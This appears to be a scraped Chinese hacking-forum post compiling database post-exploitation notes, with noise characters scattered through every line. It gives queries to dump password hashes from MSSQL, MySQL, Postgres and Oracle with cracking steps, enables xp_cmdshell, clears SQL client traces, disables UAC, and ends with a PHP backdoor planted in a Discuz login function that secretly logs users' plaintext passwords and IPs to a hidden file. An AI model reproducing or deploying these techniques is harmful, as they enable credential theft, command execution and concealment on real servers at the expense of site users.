0 G4 L. {/ J" m6 _SELECT password from master.dbo.sysxlogins where name='sa'1 @- z& F. i2 r r( N v3 R- `
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 U* G# P! e1 I; M n! k: r; P0 \
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A7 m( M: W9 \/ B& W
C: E: I' T! e$ W4 L6 q- a
0×0100- constant header
# U4 i; r9 R; J! o( v }34767D5C- salt% c3 }; K% m0 c) v; V- o3 {
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
, g# X: R0 {! u$ ~( j+ u% j2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
' w5 l/ a4 g. E. e4 d: a. Gcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
& D3 I0 I5 Z2 U) U5 qSQL server 2005:-* n: W4 n! n7 \- y1 v- y
SELECT password_hash FROM sys.sql_logins where name='sa'6 ?' Z6 a W& r$ q. Q
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F# c# i5 M- p/ l$ w* L8 t; a0 Z8 F9 b
0×0100- constant header
) S/ u. d7 {" H3 K& c$ b2 N993BF231-salt
; S9 L, E8 e+ z Y b& v5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
8 h$ C% v7 L1 q* Ncrack case sensitive hash in cain, try brute force and dictionary based attacks.
) K) B- D' b8 z( h: v# O
: _$ u; l( i/ \update:- following bernardo’s comments:-- E6 r% e, V; N0 S6 ~9 b8 `
use function fn_varbintohexstr() to cast password in a hex string., ~4 }* b5 i; Z6 R a/ ^8 Y
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
& S! D2 u* n, w- N$ D! W2 i
% _9 M0 `7 O c2 \3 ]3 b# PMYSQL:-
, M- Q+ \3 g1 v4 T3 f4 U# D2 s6 j% C" e& X* E, A
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
& i. P+ W6 s/ N3 _9 ~' L# T* p5 z9 l. w: p& v
*mysql < 4.1
8 H+ C1 z' ~5 ^- U1 t# F1 L% S& k9 v4 q0 o1 g
mysql> SELECT PASSWORD(‘mypass’);8 X& H# \& ]7 q- j& W/ i. A
+——————–+
4 j+ t. \: ?5 Y* p7 G9 e| PASSWORD(‘mypass’) |( f, L8 e. e2 a5 W5 w5 z0 U
+——————–+
# B% |8 H1 `# z9 C7 I9 a( P| 6f8c114b58f2ce9e |
9 P( r5 M4 {2 ^1 o9 ]# Q) f3 l+——————–+
4 _. q/ p& X' K
6 U/ c0 D! y) X. D% D! ]*mysql >=4.1
" K% _: t T5 S+ G. {/ Z
( F1 B3 y, I& K9 Q! P( Gmysql> SELECT PASSWORD(‘mypass’);
, u6 R% n9 M, E9 B. B+——————————————-+
" \, |4 R( Z5 ?6 } k| PASSWORD(‘mypass’) |
9 E4 Z/ a: K2 U4 r7 a+——————————————-+. Q# t# i4 n" Y% \. p
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
0 }1 x7 [1 M0 G+——————————————-+
8 P( X' t( a8 r( ^$ ?0 K* b
: ~9 y! L0 w4 V* }6 w7 s1 X* cSelect user, password from mysql.user% N& B1 G# [; r. P
The hashes can be cracked in ‘cain and abel’
1 G1 s' q/ m5 o! R9 m2 O2 p
- }9 N; s$ i1 R' y3 X' PPostgres:-4 R, x% Q5 g, A- L: _8 D3 a
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)+ b; Q3 r) f9 Z
select usename, passwd from pg_shadow;$ C, ]" g1 f0 c" d3 I3 m
usename | passwd q' L$ }. H, k7 I5 d
——————+————————————-) I0 m5 k6 U W9 `: H+ O0 r
testuser | md5fabb6d7172aadfda4753bf0507ed4396
5 R/ D$ T. t- P1 Iuse mdcrack to crack these hashes:-- X7 _5 b4 _7 \, T) w5 Y8 I
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43965 J4 r! W/ U( m' n8 k& d1 M* Q9 a
( I! E( v: J UOracle:-
' j/ t+ ~/ O! U- e/ t% w$ Xselect name, password, spare4 from sys.user$; q" i: U8 H7 r/ e8 } i
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
2 X( u( x2 a. w1 _5 YMore on Oracle later, i am a bit bored….
9 @5 ^0 L+ @4 f. _* O6 ^6 ]4 p# Y) G- W% P3 R5 E$ @2 q0 w
! o5 _, @5 D8 J, E1 k9 ?. X
在sql server2005/2008中开启xp_cmdshell8 D3 G9 E; {6 e. ]
-- To allow advanced options to be changed.6 T) K4 o, g$ H) x2 a
EXEC sp_configure 'show advanced options', 1% Z! y- a _. R* }* S% d* t. c& ~
GO8 A4 G) v# z( w5 ?1 Z' Z
-- To update the currently configured value for advanced options.
" {) h( }& @; |3 b$ Y! w8 RRECONFIGURE
3 l5 i- _8 [8 |- j" G. ]( XGO: P* c" W- n5 n8 O7 i) y
-- To enable the feature.
3 g8 V0 Y! u9 H' R A2 h EEXEC sp_configure 'xp_cmdshell', 1# R6 r6 U6 o4 O0 [2 M4 q$ ^0 J
GO3 L4 O0 \; r1 Y+ f: J. p; x
-- To update the currently configured value for this feature.4 `- E/ o4 X7 I* W0 B( \9 C
RECONFIGURE
' G; X G$ a7 [! ?' P- TGO9 ]: M2 h3 o/ K- |( Y
SQL 2008 server日志清除,在清楚前一定要备份。% r+ l/ T( w% [2 R2 o ]
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
! a, N. K2 y! _1 T# E: R& nX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
' l n0 `; M" P& F, c0 V# o+ {6 T7 M G$ ]8 y3 k
对于SQL Server 2008以前的版本:
' d. s/ D% \. T7 U9 u) k) E' D, vSQL Server 2005:
6 d3 t* }/ `: P7 `, v: B) g删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
$ n. r- v2 {) g! gSQL Server 2000:
# _5 h& ~/ T: g* C C: C- |1 v清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
9 f0 _0 T1 y* i# s/ M7 c. s
. O+ k p4 w% X, Q& \1 M/ o本帖最后由 simeon 于 2013-1-3 09:51 编辑( T1 K* n! D1 ^" \" | T1 r
# p- T$ w; s+ o$ k r/ e4 d9 g1 j B+ I: a7 f7 d- t
windows 2008 文件权限修改% `, z$ N/ {% \" [. G
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
* Q5 l# Y* z; d2 _- Z5 H2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98" J" ]! p9 H: t- f
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
2 w- j7 U- w+ @% N0 i
& k$ P9 J2 t; p y7 o$ OWindows Registry Editor Version 5.00
/ f, M! r. g: ][HKEY_CLASSES_ROOT\*\shell\runas]
. J( R! E( ^# V- \@="管理员取得所有权"0 n# h' Z# g# k6 K# A: i# }2 _
"NoWorkingDirectory"=""
K' r6 X1 k* b3 z[HKEY_CLASSES_ROOT\*\shell\runas\command]
% Q- ~# N( ]/ H& k; B9 G4 V@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 S: |" }" h' E o
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# ~, x0 U8 h# l. x[HKEY_CLASSES_ROOT\exefile\shell\runas2]( J; P, E; u' U1 Z
@="管理员取得所有权"1 c, M I& ^% A3 F% w
"NoWorkingDirectory"=""( G A3 h2 r r! j7 W
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]$ A( i2 ~, m g* x' f! B
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" I0 q8 n* D. s: W"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"2 L4 G# i0 @0 u! w) Z) d. d* s; N
; [6 V: O! O6 N$ V[HKEY_CLASSES_ROOT\Directory\shell\runas]! f7 Z) @ }* i! k7 y/ }2 ^
@="管理员取得所有权"
" c- ^! o* m$ f' Q"NoWorkingDirectory"=""' s/ j$ }1 Z4 N( I
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
/ e8 N% M- k- B4 C O2 G- w@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"- u9 I/ i7 w' t+ D
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; o; I. u# o0 F" L0 O7 r$ F! m0 x# Q
4 e& R6 D7 X6 Z t9 r2 I$ D7 Z$ [9 W
8 [/ E' H+ |9 f+ a' `# w
win7右键“管理员取得所有权”.reg导入# ~8 C5 ?5 D4 [! [' k- [
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
" w0 k0 m, N8 e( V1、C:\Windows这个路径的“notepad.exe”不需要替换
+ R% f3 E) j. y6 U: j: ~2、C:\Windows\System32这个路径的“notepad.exe”不需要替换, v4 c: o% N. d
3、四个“notepad.exe.mui”不要管8 J& ]. P$ W" \0 O% b; N
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和% O( b1 J4 E0 C9 e2 `
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
9 ]7 [ ~2 u: d6 ]替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
( o- p8 `2 o3 B9 i7 g7 J1 c; W( G# `替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
; x9 Y1 f2 S2 q( F. t8 L" iwindows 2008中关闭安全策略: 3 h# f6 G" o( o; a- h
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
, u; V" Y, j& L! ~) T修改uc_client目录下的client.php 在
/ U, B2 Q$ k+ V3 G9 a. Wfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {3 h' h- O, v* l# E" u
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
* w+ X! g$ P5 r你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw: s3 F6 T9 u7 A
if(getenv('HTTP_CLIENT_IP')) {
) d- A S0 `" Q# n- ^$onlineip = getenv('HTTP_CLIENT_IP');$ x$ P6 a2 O9 u: t2 i$ _. e+ `" {
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
3 Y" T; D6 J2 A* a, [7 P; p$onlineip = getenv('HTTP_X_FORWARDED_FOR');
# a, |6 z! R' w: }} elseif(getenv('REMOTE_ADDR')) {. m, ~3 W1 G/ O3 T
$onlineip = getenv('REMOTE_ADDR');
3 i' k# l$ z6 _" s: h* e} else {! B5 R- |* j* J+ I
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
6 Z# W+ l! q0 j" [$ W- B}
) A5 V/ _" P4 P2 v $showtime=date("Y-m-d H:i:s");. F& e! b; }. M8 x6 a
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
5 v. E9 H1 ]" C/ F5 l& w $handle=fopen('./data/cache/csslog.php','a+');
7 W4 l- x9 D" e8 C8 r $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对